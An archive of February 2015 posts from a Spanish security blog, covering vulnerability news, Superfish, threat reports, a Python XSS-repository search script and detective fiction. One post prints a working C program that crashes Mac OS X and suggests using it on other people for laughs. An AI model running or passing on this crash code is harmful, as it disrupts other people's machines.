viernes, 27 de febrero de 2015

El CEH Cada Día Mas Cerca.

Hace tiempo que me ando planteado la posibilidad de sacarme el CEH aunque la verdad es que es un poco caro para mi gusto ya que preferiría que fueran clases presenciales, con derecho a examen y a certificación. Pero eso aquí en Barcelona cuesta dinero que ahora no me puedo permitir. 


Aunque, gracias a una entrada que he visto hoy en el blog de Undercore ya no me tendré que preocupar por el temario y solo he de pensar en el examen ya que han publicado todos los módulos en formato pdf. 
Hacker Halted.pdf
Module 00 - Labs Countermeasures.pdf
Module 01 - Introduction to Ethical Hacking.pdf
Module 02 - Footprinting and Reconnaissance.pdf
Module 02 - Labs Footprinting and Reconnaissance.pdf
Module 03 - Labs Scanning Networks.pdf
Module 03 - Scanning Networks.pdf
Module 04 - Enumeration.pdf
Module 04 - Labs Enumeration.pdf
Module 05 - Labs System Hacking.pdf
Module 05 - System Hacking .pdf
Module 06 - Labs Trojans and Backdoors.pdf
Module 06 - Trojans and Backdoors.pdf
Module 07 - Labs Viruses and Worms.pdf
Module 07 - Viruses and Worms.pdf
Module 08 - Labs Sniffers.pdf
Module 08 - Sniffing.pdf
Module 09 - Labs Social Engineering.pdf
Module 09 - Social Engineering.pdf
Module 10 - Denial of Service.pdf
Module 10 - Labs Denial of Service.pdf
Module 11 - Labs Session Hijacking.pdf
Module 11 - Session Hijacking.pdf
Module 12 - Hacking Webservers.pdf
Module 12 - Labs Hacking Webservers.pdf
Module 13 - Hacking Web Applications .pdf
Module 13 - Labs Hacking Web Applications.pdf
Module 14 - Labs SQL Injection.pdf
Module 14 - SQL Injection.pdf
Module 15 - Hacking Wireless Networks.pdf
Module 15 - Labs Hacking Wireless Networks.pdf
Module 16 - Hacking Mobile Platforms.pdf
Module 17 - Evading IDS, Firewalls, and Honeypots.pdf
Module 17 - Labs Evading IDS, Firewalls and Honeypots.pdf
Module 18 - Buffer Overflow.pdf
Module 18 - Labs Buffer Overflow.pdf
Module 19 - Cryptography.pdf
Module 19 - Labs Cryptography.pdf
Module 20 - Penetration Testing.pdf
References.pdf

Enlace de la descarga:

Fuente de la entrada: 

jueves, 26 de febrero de 2015

Las Cinco Nuevas Vulnerabilidades En SAP.

Hoy, en uno de esos vistazos rápidos obligados a [StateList] me he encontrado de morros con cinco vulnerabilidades que afecta a SAP. Bueno, concretamente a cuatro de ellas SAP Business Objects y a SAP HANA lo cual no ha sido un susto tan gordo pero como odio un poco a SAP y supongo que a mas de uno le irá bien esta información, aquí la tenéis: 



SAP Business Objects:

Unauthorized Audit Information Delete:
Unauthorized Audit Information Access:
Unauthorized File Repository Server Write:
Unauthorized File Repository Server Read:
SAP HANA:

Multiple Reflected Cross Site Scripting Vulnerabilities: 
Espero que os haya gustado y servido. 

Sed Buenos ;) 

miércoles, 25 de febrero de 2015

¡¡Widowseros!! ¡Estamos de Celebración!

Hoy me he topado de cara con la lista de sistemas mas vulnerables del 2014 y la verdad es que me he llevado una grata sorpresa al ver quien estaba en la última posición. Estos años defendiendo a Windows Vista y luego a Windows 8 (a Windows 10 que le den hasta que no saquen el Keylogger) han dando al final su fruto. 

¡Windowseros/Windowseras Microsoft Windows es el sistema operativo menos vulnerable!




La verdad es que los datos son los que hay: 



Aunque como bien han dicho en la fuente en SecurityByDefault, estos datos solo corresponden a sistema operativo como tal, si cogemos y analizamos las aplicaciones encontramos que Internet Explorer es el software mas vulnerable. Y nos reíamos de Adobe Flash .. 


Así que, es una victoria a medias ya que en Windows tenemos a Internet Explorer instalado por defecto. De esta manera y dejando de lado las discusiones tontas, ningún sistema operativo es 100% seguro así que nos hemos de quedar con el que nos sintamos mas a gusto y protegidos.

Fuente de esta entrada:


Sed Buenos ;) 

martes, 24 de febrero de 2015

imagen.- Así Es Como Funciona Un Navegador.

Hoy repasando un poco mi Twitter he encontrada la que sea, posiblemente, una de las mejores explicaciones de como funciona un navegador. Ademas me encanta como está explicada y dibujada. 


Bueno, hoy toca una entrada  rápida y hacia mucho que no os ponía una imagen así de curiosa. Espero que a vosotros también os guste. 

Sed Buenos ;) 

lunes, 23 de febrero de 2015

ZeuSTracker.- Donde, Cuando y En Que IP Hay Un Sevidor De ZeuS

Para los que lleváis un tiempo en este blog sabréis de sobras que ZeuS es un troyano bancario que fue muy famoso en su época y que ahora lo seguimos encontrando en multitud de mutaciones. Zeus Tracker es una pagina web destinada a recopilar y a rastrear IP de posibles servidores de ZeuS C&C. 


Lo genial de esta buen es que cualquiera que encuentre y analice una muestra de ZeuS puede subir la dirección IP a esta pagina para colaborar y hacer mas grande la lista de IP para poder bloquearlas posteriormente. También se incluyen hostnames. 

Aquí teneis el enlace a la página por si le quereis echar un ojo:
Más Información:

domingo, 22 de febrero de 2015

Vídeo.- Tendré Que Comparme Una Cámara.

La verdad es que por muchas veces no se necesita un 0'day ni montar una botnet para poder sacarle la contraseña a alguien. A veces vale mas salir con un micro y una cámara a la calle para que con 4 preguntas te acaben relevando la contraseña. Esto mismo es lo que han hecho en el show de JimmyKimmel y la verdad es que hay muchos que pican. 

Vedlo vosotros mismos:


Sed Buenos y que no os engañen ;) 

sábado, 21 de febrero de 2015

Kernel Panic en Mac OS X Con Solo 10 lineas de Código

Ya que supongo que esta asumido que en los productos Apple también hay Malware, también os diré que Mac OS X también se pude colgar con muy pocas lineas de código. Ademas, escritas en C.


Estas son este es el código que nos permitirá hacernos unas risas con cualquiera que utilice un Mac Os X en cualquiera de las últimas versiones:

#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach-o/dyld.h>

int
main (int argc, char * argv[])
{
  volatile char * library;
  const mach_vm_size_t page_size = getpagesize ();
  const mach_vm_size_t buffer_size = 3 * page_size;
  char buffer[buffer_size];
  mach_vm_size_t result_size;

  library = (char *) _dyld_get_image_header (1);
  mach_vm_protect (mach_task_self (), (mach_vm_address_t) (library + page_size), page_size, FALSE, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY | VM_PROT_EXECUTE);
  library[page_size]++;
  library[page_size]--;
  result_size = 0;
  mach_vm_read_overwrite (mach_task_self (), (mach_vm_address_t) library, buffer_size, (mach_vm_address_t) buffer, &result_size);

  return 0;
}

Más Información sobre el script:

Sed Buenos con esto ;) 

viernes, 20 de febrero de 2015

Más Información Sobre Superfish y La Disculpa de Lenovo.

Como no puede ser de otra manera, entre ayer por la noche y hoy ha salido un montón de información sobre este adware. Tanto ha sido así que Lenovo ha pedido perdón a sus consumidores e ha indicado como desinstalarlo completamente. 


La verdad es que viniendo de una empresa grande una disculpa se traduce a algo así como, sabíamos que podía fallar lo haremos de otra manera para que no os deis cuenta. Pero siempre esta bien ver como afectan este tipo de problemas a ciertas compañías. 


Para saber si sois vulnerables a esta Malware es tan facil como entrar en el siguiente enlace y ver si os sale un "warning", un mensaje de aleta como el de la siguente imagen ya que esta pagina web está preparada con el certificado de Superfish y al no encontrar ese certificado digital te advierte de que tu conexión no va a ser "privada". 

Bueno, después de todo esto y ya que era el proposito de la entrada os voy a recomendar un paper para todos aquellos que aún no sepáis como funciona este malware y como conseguía insertar la publicidad donde lo hacia. Espero que os guste. 
Pero aunque Lenovo ya ha sacado una guía para desinstalarlo completamente junto a su tweet de disculpas, algunas empresas ya lo han analizado y cazado con sus antivirus. 


Sed Buenos ;)

jueves, 19 de febrero de 2015

Lenovo Y Su Bichos.- ¿Adware Como Tecnica De Marqueting?

Es de sobras sabido que las empresas quieren saber que marcas buscamos, nuestros gustos o simplemente lo que buscamos por Internet, para poder hacer estadísticas y ofrecernos una mejor "publicidad mas enfocada al consumidor". Pero, Lenovo a decidido cortar por lo sano e instalar un malware en sus equipos para que nos añada la publicidad que ellos quieran mientras hacemos búsquedas en Google. 

"El adware, llamado Superfish, se instala, según se informa, en una serie de de consumidores de ordenadores portátiles Lenovo fuera de la caja. Superfish parece afectar a Internet Explorer y Google Chrome en estos sistemas Lenovo."
Aunque ya dijeron que lo quitarían de forma temporal, lo han vuelto ha hacer, es mejor no fiarse.

"Hemos eliminado temporalmente Superfish de nuestros sistemas de consumo hasta que Superfish es capaz de proporcionar una compilación de software que se ocupa de estas cuestiones. En cuanto a las unidades que ya están en el mercado, hemos solicitado que Superfish actualización automática una solución que aborde estos temas."
La verdad es que espero que las empresas aprendan que al consumidor no le gusta nada que le engañen de esta manera. Igual que he hecho con no probar Windows 10 hasta que retiraran el Keylogger pienso hacer lo mismo con este producto de Lenovo. 

Fuente: 
Sed Buenos ;)

miércoles, 18 de febrero de 2015

Targeted Cyberattacks Logbook.- Otra Sorpresa de Kaspersky

Os pensareis que Kaspersky me regala licencia o me paga algo por cada entrada que hago, pero es que en realidad me sorprende muchísimo con toda la información que sacan y creo que la entrada de hoy también os va a gustar.


Supongo que ya os sonaran las siglas APT y la multitud de ciberataques que hay en un día para hacerse con el control de un servicio, una empresa, o algo que les proporcione dinero. Pero ha habido un montón de APT sofisticadas y enlazadas entre ellas, así que estaría genial poder ver toda la información referente a cada una de estas amenazas y su correlación entre ellas con un solo clic. 

Kaspersky ya ha pensado en ello y nos presentan Targeted Cyberattacks Logbook una web genial donde se recoge muchísima información sobre APT y con solo hacer un clic. Ademas, los barcos molan mucho. 

Este es el enlace a la web: 
Fuente: 
Sed Buenos ;) 

martes, 17 de febrero de 2015

Python.- Búsqueda Pasiva De Vulnerabilidades XSS.

Hace tiempo que os hablé de XSSpose, un repositorio de vulnerabilidades XSS y hasta hice un script en Python para buscar en las diferentes paginas. Pero no servia para nada ya que era demasiado lento y tenias que escribir la pagina web perfecta para que lo encontrara.


Así que me he puesto a crear un script que utilizara la barra de búsqueda de la pagina y me lo guarde todo en un .txt por lineas la mar de mono. Ademas, lo he preparado para cuando conozca algún otro repositorio similar pueda hacer el parseo correspondiente.

Espero que os guste, os dejo el código aquí, OJO esta escrito en Python 3.4:

import urllib.request
import re

def XSSearch(query):
    data = "https://www.xssposed.org/search/?search="+ query +"&type=host"
    web = urllib.request.urlopen(data)
    d = str(web.read())
    d1 =  re.search(r"</h3>(.*)XSS mirror", d)
    d2 =  re.search(r"",d)
    print ("--> " + d1.group(1) + "Vulnerabilidades encontradas en "+"%s" % query)
    print ("    + " + data + "\n")
    reporte =  open("VXss.txt", "a+")
    reporte.write("XSSposed:")
    reporte.write("--> " + d1.group(1) + "Vulnerabilidades encontradas en "+"%s" % query)
    reporte.write("    + " + data + "\n")

if __name__ == "__main__":
 
    webs = []
    while True:
        busqueda =  input("Web a buscar: ")
        webs.append(busqueda)
        if busqueda == "":
            print ("XSSposed:")
            for web in webs:
                if not web == "":
                    XSSearch(web)
            input("El resultado de estas busquedas tambien ha sido guardado en VXss.txt, dale a [Enter] para salir:")
            break
             
        print ("Listado de Webs a buscar: ")      
        print (webs)

Seguro que se podría mejorar y lo primero que se me ocurre es añadirle webs que vayamos recopilando desde un .txt, que lea las filas y las añada a la lista para ser buscadas a luego. 

Algo así:

webs = []
webd = open("Webdic.txt","r")
lineas = webd.readlines()
webd.close()
for line in lineas:
    print (line)
    webs.append(line)
print (webs)


Si conocéis mas repositorios XSS decidmelo que tengo ganas de que esto tire para adelante por favor. 

Sed Buenos ;) 

lunes, 16 de febrero de 2015

KasperskyLab y Su Informe Sobre Ciberamenazas Financieras

Como ya sabéis, Kaspersky ha estado haciendo los deberes y cada día me va sorprendiendo mas en su lucha contra el cibercrimen, está ya lejos de esa empresa que vendía sus antivirus a precios altos y después se comían un PDF malicioso. Ahora la gente de KasperskyLab trabaja duro y nos facilitan un montón de información para que podamos aclarar mas de una duda. 


En este caso, hoy os quiero recomendar el Informe sobre la ciberamenazas financieras que fueron registradas durante todo el 2014. Este no me ha sorprendido mucho ya que por las noticias que han habido durante todo el año pasado era algo previsible pero si que ayuda a entender como esta actualmente el panorama de la ciberamenazas en el sector financiero en cuanto a defensa y lo rápido que se mueven los cibercriminales.

Os dejo el enlace al informe aquí abajo:

Sed Buenso ;) 

domingo, 15 de febrero de 2015

Vídeo.- Cumbre Sobre la Ciber-seguridad y La Protección del Consumidor.

Si ayer os hablaba del Top 4 de la soluciones de mitigación del departamento de defensa de Australia, hoy me ha encanta encontrarme de morros con la cumbre sobre Ciber-seguridad de la Casa blanca. La verdad es que no he llegado a ver lo entero, pero creo que las palabras de Obama no van a dejar indiferente a nadie. 

Os dejo el vídeo aquí abajo. 


“(S)ince this is a challenge that we can only meet together, I’m announcing that next month we’ll convene a White House summit on cybersecurity and consumer protection. It’s a White House summit where we're not going to do it at the White House; we're going to go to Stanford University. And it’s going to bring everybody together — industry, tech companies, law enforcement, consumer and privacy advocates, law professors who are specialists in the field, as well as students — to make sure that we work through these issues in a public, transparent fashion.”
— President Obama, January 13, 2015

Muchisima mas información:

Sed Buenos ;) 

sábado, 14 de febrero de 2015

Departamento De Defensa De Australia y Sus Estrategias Para Mitigar Ciber-ataques.

Hoy me he topado de morros con esta página web y es que el 85% de las intrusiones cibernéticas dirigidas a Australia son prevenidas gracias al Top 4 de las estrategias de mitigación que ellos utilizan. 


Estas son los 4 puntos que utiliza el departamento de defensa de Australia para la mitigación de ciber-ataques: 
  • Utilizar listas blancas de aplicaciones de software. 
  • Aplicaciones de parches como Java, visores PDF, Flash, navegadores web y Microsoft Office
  • Parches para vulnerabilidades del sistema operativo
  • Restringir privilegios de administración para los sistemas operativos y las aplicaciones.
La verdad es que no son puntos nuevos ni mucho menos, es mas, es lo que la gente que trabaja en seguridad informática ha estado diciendo desde hace mas de tres años. Aunque me ha encantado que se haya corroborado con tanta información y mas proviniendo de un departamento de defensa. 


Muchísima mas información y muchos mas detalles sobre como este departamento lucha contra los ciber-ataques: 

Sed Buenos ;) 

viernes, 13 de febrero de 2015

Exploit Para CVE-2015-1574 DoS Para La App De Gmail En Android

La vulnerabilidad CVE-2015.1574 es bastante curiosa ya que afecta a la versión 4.2.2.0200 App de Gmail para Android. Aunque solo ha sido probada sobre un Samsung Galaxy 4 mini totalmente actualizado, esta vulnerabilidad provoca una denegación de servicio utilizando un correo especialmente creado. Ademas, es obra de [Hector Marco] y [Ismael Ripoll] de la Universitat Politècnica de València y el exploit esta escrito en Python, que mas puedo pedir.


Aquí tenéis el exploit por si le queréis echar un ojo: 
Si teneis mas curiosidad sobre la vulnerabilidad, el exploit y el bug que hace esto posible aquí os dejo el enlace a la web de los creadores: 
Sed Buenos con esto 0;) 

jueves, 12 de febrero de 2015

Hardware Hacking.- El Taller Que Me Perdí en el T3ch Fest.

Hoy curioseando las redes sociales, el mail y el feed de blogs que tenia pendientes desde ayer. Me he topado de morros con las Slides del taller de [Jaime Álvarez] y [Roberto García] sobre Hardware Hacking, que la verdad es un tema al que me encantaría empezar a conocer. 


Os dejo las slides aquí abajo ya que os la recomiendo encarecidamente y creo que os gustará:


¿Nadie me recomienda algunos paper para ponerme a estudiar un poco esto? Guiño guiño patada patada.

Sed Buenos ;) 

martes, 10 de febrero de 2015

Hangout ON.- Peritaje Informático.

Como últimamente os estoy dando la brasa con las historias de detectives y el peritaje forense, creo que este "capitulo" del ya conocido, en este blog,  programa Hangout ON os puede interesar y mucho a todos los que estáis empezando con el tema o os pica la curiosidad. 


Espero que os guste.

Sed Buenos ;) 

lunes, 9 de febrero de 2015

Pack .- Albert's Daily - ¡Catastrofe Aerea! - Por Fin.

Los que ya llevais mas tiempo leyendo este blog lo sabréis pero para los que no lo sabéis Albert's Daily es una serie donde cuento historias sobre un detective imitando o intentadolo al menos, al libro de [Hacker Epico]. Aunque mucho mas orientado al análisis forense y resolviendo algún que otro reto por el camino.


Con la última entrada complete la historia que faltaba por terminar haciendo otro pack para que lo podáis ver entero, de principio a fin. 

domingo, 8 de febrero de 2015

Infografia.- El 61% Del Trafico de Internet "No es humano"

Pues si, hoy me he sorprendido encontrarme con esta infografia en el blog de flu project y no es que dudara de la existencia de bots en Internet pero con tanta gente teniendo acceso a la red de redes no pensaba que ese tanto por ciento fuera tan elevado.

La infografia llega hasta el 2013 y no se porqué, creo que esta cifra ha aumentado.


Fuente:



Sed Buenos ;)

sábado, 7 de febrero de 2015

StateList.- Una Tontería Que Vendrá Bien a Mas De Uno.

Como en esta tarde de sábado no tenia mucha cosa que hacer y que tenia la idea en la mente desde hace días, he decidió crear un blog rápido y enlazar los RSS de los grandes repositorios de vulnerabilidades y exploits para que en una ojeada se puedan ver las ultimas novedades en todas ellas. 


Os parecerá una chorrada de idea y la verdad es que lo es, pero almenos a mi me ahorrará tener que abrir un montón de pestañas en mi navegador ya que con un simple vistazo veré si hay algo nuevo.

Seguro que a mas de uno también la va a ir bien y si creéis que se ha de añadir algún RSS mas a la pagina, por favor, dejádmelo por Facebook, Twitter o en los comentarios. Sin extenderme mas, os dejo el enlace aquí abajo aunque también podréis acceder dando le clic a [StateList(SecList)] de la parte de arriba del blog.
Sed Buenos ;) 

viernes, 6 de febrero de 2015

Paper.- GHOST La Famosa Vulnerabilidad En Linux

Ya casi hace una semana desde que salió esta vulnerabilidad critica en Linux que a mas de uno  le habrá dado algún dolor de cabeza. 


Hoy, buscando nuevas vulnerabilidades por diferentes bases de datos, me he encontrado de morros con un paper hecho por Akati Consulting, donde se muestran ejemplos de la vulnerabilidad e indican las diferentes soluciones para esta vulnerabilidad. Es un buen paper y os lo recomiendo mucho. 

Os dejo el enlace aquí: 

Sed Buenos con esto 0;) 

jueves, 5 de febrero de 2015

Riot Games y Su Bug Bounty Program

Hoy y aprovechando que ha salido un exploit para [robar los riot points] de cuentas ajenas. me he enterado que Riot la empresa creadora de League of Legends tenia un programa de recompensas para la gente que reporte fallos de seguridad para el juego. 

"Cuando los investigadores tropiezan con un problema nuevo y grave de seguridad, pueden visitar nuestra página en HackerOne para presentar su hallazgo, potencialmente, a cambio de dinero en efectivo y reputación."


Así que ya sabéis, todos a abrirse una cuenta en Hacker One para empezar a reportar fallos y ganar dinero. Os dejo el enlace aquí abajo. 
Más información respeto al programa: 

 Sed Buenos ;)

miércoles, 4 de febrero de 2015

INCIBE.- Guía De Toma De Evidencias En Windows.

Hoy, haciendo un poco de búsqueda en INCIBE ya que entro de tanto en tanto para ver que novedades hay. Además que sus avisos de seguridad, en mi opinion son muy acertados y merecen la pena. 

Hoy no he ido directo a los avisos como suelo hacer las mayoría de veces sino que me he puesto a curiosear noticias. Cual ha sido mi sorpresa al encontrarme con un tremendo pdf dedicado a la Adquisición de evidencias en Windows al mas puro estilo Forense y avalado por el Ministerio. 


La verdad es que esta esta bastante completa y me ha dado mas de una idea para dedicarme un tiempo mas con mis queridos scripts en Python. 


Un lujo poder disponer de un material tan bueno. No os lo puedo recomendar lo suficiente. Os dejo el enlace aquí abajo para que le echéis un ojo vosotros mismos. 
Fuente: 

martes, 3 de febrero de 2015

Albert's Daily - ¡Catastrofe Aerea! (6/6)

15:05 p.m Barcelona

Cogí mi gabardina, guardé el USB en el bolsillo interior de esta y volví a intentar localizar a Isaac. Esta vez contestó.

- ¿Isaac? - pregunté medio agobiado y con unas ganas inmensas de sacarme esa información de encima. 

- Si,  ¿Ya tienes lo mio? ¿A que vienen tantas llamadas? - pregunto antes de que pudiera cantarle las cuarenta.

- Te la cambio por algunas respuestas - dije en todo burlón mientras mi abría el Google Maps con la mano derecha - ¿Donde dices quedamos?

- Que tal en Carrer Bailèn, 43 es un bar de confianza. - dijo casi sin pensar. 

- De acuerdo, voy.
 
Salí del despacho tan rápido como puede para evitar que Gisela me preguntara por los informes que, aunque era verdad que "casi" los tenia acabados,  poder evitarlos un rato mas era un placer que no podía evitar. 


15:40 p.m Barcelona. 

Llegué al Bar, no era para nada el sitio que yo escogería para hablar de estos temas ya que, en lugar de tranquilidad había ruido y si yo prefería la privacidad, había bastante gente curiosa mirando el juego de la mesa de al lado. Un lugar algo atípico pero seguro que él tendría buenas razones para haber quedado allí.

Me pedí una cerveza, me senté en una mesa cualquiera y eche un vistazo alrededor. Un punto bueno que tenia el local que no contaba con cámaras de vigilancia.  

15:50 p.m Barcelona. 

Pedí mi segunda cerveza, me estaba empezando a impacientar. Isaac apareció al cabo de 5 minutos con un juego de mesa que le ocupaba las dos manos y me hizo una seña que no llegue a entender así que me quede quieto sin saber que hacer en ese momento. 

- Perdón por la espera,  pero es que no sabia por cual decidirme - dijo el volviendo ha hacer el mismo gesto. 

¿No pretenderá que yo juegue a eso? - pensé para mi estrechándole la mano. 

- ¿Que juego es este? - pregunte con toda la curiosidad del mundo, ya que parecía raro. 

- Se llama Sombicide, ya veras como te va a gustar y me mires con esa cara - dijo Isaac haciendo un ademán con la mano. 

16:55 p.m Barcelona. 

La verdad es que no estuvo mal el juego y en la mitad de la partida, aprovechando que la ida y venida de miniaturas de un lado para otro, me dio tiempo a  pasarle el usb y a comentarle la jugada de la forma mas discreta que se me ocurrió. Pero, mientras estábamos recogiendo, solo me quedaba una última pregunta que hacerle.  

- ¿Para que querías esta información? - pregunté miradolo por encima de mis gafas.

Isaac se quedó un momento quieto, me miró de reojo.

- Ya has notado que no estoy dispuesto a contarte nada sobre esto, ¿verdad? - dijo mientras se levantaba para guardar el juego. 

Entrelacé los dedos de mi mano, las puse delante de mi boca antes y mantuve mi mirada hacia adelante. 

- No vuelvas a pasarme este tipo de trabajos otra vez o me veré obligado a contestar por mi mismo a esas preguntas - dije mientras dibujaba una sonrisa entre dientes claramente visible desde la mirada de Isaac. 

- Ya veremos - dijo el mientras se marchaba y me devolvía la misma sonrisa. 

17:23 p.m Barcelona. 

La verdad es que no había ido del todo mal, aunque me fastidiaba no haber obtenido todas las respuestas que necesitaba saber y lo que me irritaba aun mas era que ahora, no solo tendría que volver a ponerme con los informes  si no que había perdido una memoria USB. La factura de este mes la va a salir cara. 

Así acabó el día, tan pronto estas investigando una catástrofe aérea como que estas rellenando informes.

A veces no hay finales con fiesta y alcohol sino que vuelves a tu oficina como si nada hubiera pasado, cerrándote en tu oficina de nuevo sin que nadie sepa lo que has hecho y queriendo llegar a casa para volver a empezar una día mas. 

lunes, 2 de febrero de 2015

WhatsApp Web.- Tus Fotos Son Las De Todos

Como ultimamente estoy a tope con el tema de las vulnerabilidades hoy me he encontrado con una vulnerabilidad de WhatsApp Web que permite que los usuarios tengan acceso a las imágenes que no se les permite sean vistas por cualquier otra. Como por ejemplo, fotos enviadas  y las que una vez fueron eliminadas.


Aunque no es el único fallo que tiene WhatApp Web ya que incluso después de la restricción de la foto de perfil para que sólo la puedan ver tus contactos, sigue siendo visible a todo el mundo que tiene su número de contacto...


Fuente: 
Sed Buenos con esto 0;)

domingo, 1 de febrero de 2015

Las Infraestructuras Más "DdoSeadas" del 2014.

Los DdoS se han convertido una moda dispuesta a quedarse, ya que es una manera muy fácil de poder bloquear una organización X durante el tiempo que tu elijas y con las manos limpias ya que hasta puedes contratar el servicio online. 

Así que, aquí tenéis las infraestructuras mas comúnmente atacadas durante el año pasado. 


Si estáis al día ya sabréis que el mundo de los videojuegos y sobretodo la infraestructura que utilizan Sony y Xbox fueron atacadas por este tipo de ataques. Ademas de la perdida de dinero y reputación para ambas empresas.  

Fuente: 
Sed Buenos ;)